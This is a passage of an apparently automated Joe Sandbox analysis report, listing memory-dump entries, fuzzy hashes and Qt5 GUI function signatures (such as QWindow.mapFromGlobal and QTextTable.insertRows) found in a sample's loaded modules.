                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Text$?itemBlock@@@List@@String@@Text@malloc
                                                                                                                                                                                                                • String ID: BJ9$QTextList$itemText$itemText(self, a0: QTextBlock) -> str
                                                                                                                                                                                                                • API String ID: 1711211281-3233298988
                                                                                                                                                                                                                • Opcode ID: 1b33ffd87ba07bb60495c6d2b5df045d12916c0eb9535c335cbae52a3c64bd32
                                                                                                                                                                                                                • Instruction ID: 58c8a1951f389ee54f55480dae0d53713063201d8c73ee76e22ee700f8d060dd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b33ffd87ba07bb60495c6d2b5df045d12916c0eb9535c335cbae52a3c64bd32
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B112BB5B18F46C1EB10DF25E8886A933A9FB59B84FA140B6CA4C03320DF3DE949C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?mapFromGlobal@QWindow@@QEBA?AVQPoint@@AEBV2@@Z.QT5GUI ref: 00007FFB9A30BBD0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?mapFromGlobal@Point@@V2@@Window@@malloc
                                                                                                                                                                                                                • String ID: BJ9$QWindow$mapFromGlobal$mapFromGlobal(self, pos: QPoint) -> QPoint
                                                                                                                                                                                                                • API String ID: 758699921-1033894547
                                                                                                                                                                                                                • Opcode ID: 3617b761648dacb152f3fb6bfc4bed94e73d2d5924613efb55997b5588de2465
                                                                                                                                                                                                                • Instruction ID: c7f150db1f7e85236f3fcdb3382adf5b271493f493756bfa804254f53b5cb306
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3617b761648dacb152f3fb6bfc4bed94e73d2d5924613efb55997b5588de2465
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F111CB5B18F46C1EB50DF25E8886A933A8FB59B84F6140B6CA5C03320DF3DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?intersected@QPolygonF@@QEBA?AV1@AEBV1@@Z.QT5GUI ref: 00007FFB9A2D1C69
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?intersected@PolygonV1@@malloc
                                                                                                                                                                                                                • String ID: BJ9$QPolygonF$intersected$intersected(self, r: QPolygonF) -> QPolygonF
                                                                                                                                                                                                                • API String ID: 991172726-2371428186
                                                                                                                                                                                                                • Opcode ID: 28c92a7a63e5d6a103c88df67a1b41abedc2c5ba89578f73d96caa2a719bab15
                                                                                                                                                                                                                • Instruction ID: f100fcad4d8c0a10da9c6bdf80eaeb02085cb1fdc619aef3c42110fe1a6b37a9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28c92a7a63e5d6a103c88df67a1b41abedc2c5ba89578f73d96caa2a719bab15
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 311128B5B18B46C1EB10DF65E8896A933A8FB55B84FA140B6CA4C43320DF3DD949C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?setVerticalHeaderItem@QStandardItemModel@@QEAAXHPEAVQStandardItem@@@Z.QT5GUI ref: 00007FFB9A2F1CE2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Standard$?setHeaderItemItem@Item@@@Model@@Vertical
                                                                                                                                                                                                                • String ID: BiJ:$QStandardItemModel$setVerticalHeaderItem$setVerticalHeaderItem(self, row: int, item: Optional[QStandardItem])
                                                                                                                                                                                                                • API String ID: 1702680858-2901156415
                                                                                                                                                                                                                • Opcode ID: 4bcbfa0ab82216598930bae98268b807b94918e2fb6a0126878742ddc6a421d1
                                                                                                                                                                                                                • Instruction ID: a7e1be9f739c6fafcde6098433d6950b5b7be4a8a95ed9d288fd2028326edab5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4bcbfa0ab82216598930bae98268b807b94918e2fb6a0126878742ddc6a421d1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E1104B6A08F56C1EB20CF64E8886A933A8FB48B84F9141B6CA9C43320DF7DD559C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?replace@?$QVector@VQPoint@@@@QEAAXHAEBVQPoint@@@Z.QT5CORE ref: 00007FFB9A2E79C2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?replace@?$Point@@@Point@@@@Vector@
                                                                                                                                                                                                                • String ID: BiJ9$QPolygon$replace$replace(self, i: int, value: QPoint)
                                                                                                                                                                                                                • API String ID: 4224568828-2626586282
                                                                                                                                                                                                                • Opcode ID: 0bb4fb0cd837303f7185ca0a649baf408bee75285c7a214f355722fd5b29f52d
                                                                                                                                                                                                                • Instruction ID: 52266e6b1fc8020e708efb027701686127974010553ce1e611b1743fa6b376c4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bb4fb0cd837303f7185ca0a649baf408bee75285c7a214f355722fd5b29f52d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D01119B5A08F46C1EB20CF20E8886A933B8FB49784F9141B6CA9C43320DF7DD959C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?objectForFormat@QTextDocument@@QEBAPEAVQTextObject@@AEBVQTextFormat@@@Z.QT5GUI ref: 00007FFB9A2E99E3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Text$?objectDocument@@Format@Format@@@Object@@
                                                                                                                                                                                                                • String ID: BJ9$QTextDocument$objectForFormat$objectForFormat(self, a0: QTextFormat) -> Optional[QTextObject]
                                                                                                                                                                                                                • API String ID: 1083227716-3375662907
                                                                                                                                                                                                                • Opcode ID: e24c0b50383136869169771f1028a31cdc27df598ff3f87bbc9423cb8c00f568
                                                                                                                                                                                                                • Instruction ID: ac7e97334bb781e51c1ef8947a1e1613cd0c7cd4cb68ce17dc66eeed6024a8b7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e24c0b50383136869169771f1028a31cdc27df598ff3f87bbc9423cb8c00f568
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85111CB5B18E46C1EB10DF75E8886A933A9FB59B84FA180B6CA5C43320DF3DD559C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?removeItem@@Rows@Standard
                                                                                                                                                                                                                • String ID: Bii$QStandardItem$removeRows$removeRows(self, row: int, count: int)
                                                                                                                                                                                                                • API String ID: 3935922224-2605227661
                                                                                                                                                                                                                • Opcode ID: 98b5eab0ca663b7545f5dbbba6bba62b6644beecb35b6c135b3ce3851194d83f
                                                                                                                                                                                                                • Instruction ID: 840f4d53224befc561f1e3ff1e6869c8757de18764f99cae990ac8efdbfdba5a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98b5eab0ca663b7545f5dbbba6bba62b6644beecb35b6c135b3ce3851194d83f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8111D4B6B18F56C1EB109B25E8886A933A8FB48B84FA14176CA5D03320DF39D94AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?insertRows@Table@@Text
                                                                                                                                                                                                                • String ID: Bii$QTextTable$insertRows$insertRows(self, pos: int, num: int)
                                                                                                                                                                                                                • API String ID: 1677532092-1991279250
                                                                                                                                                                                                                • Opcode ID: de523cb18ab00669ce1c2bcc5915b3549b91accafaee1164ee70f329b86bfd52
                                                                                                                                                                                                                • Instruction ID: 970dc458741b5501317faae53a760dcb3d99ac2150480a63e4551730340130ab
                                                                                                                                                                                                                • Opcode Fuzzy Hash: de523cb18ab00669ce1c2bcc5915b3549b91accafaee1164ee70f329b86bfd52
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C911E3B6B18F56C1EB10DF25E8886A933A8FB49B84FA14172CA5D03320DF79D95AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
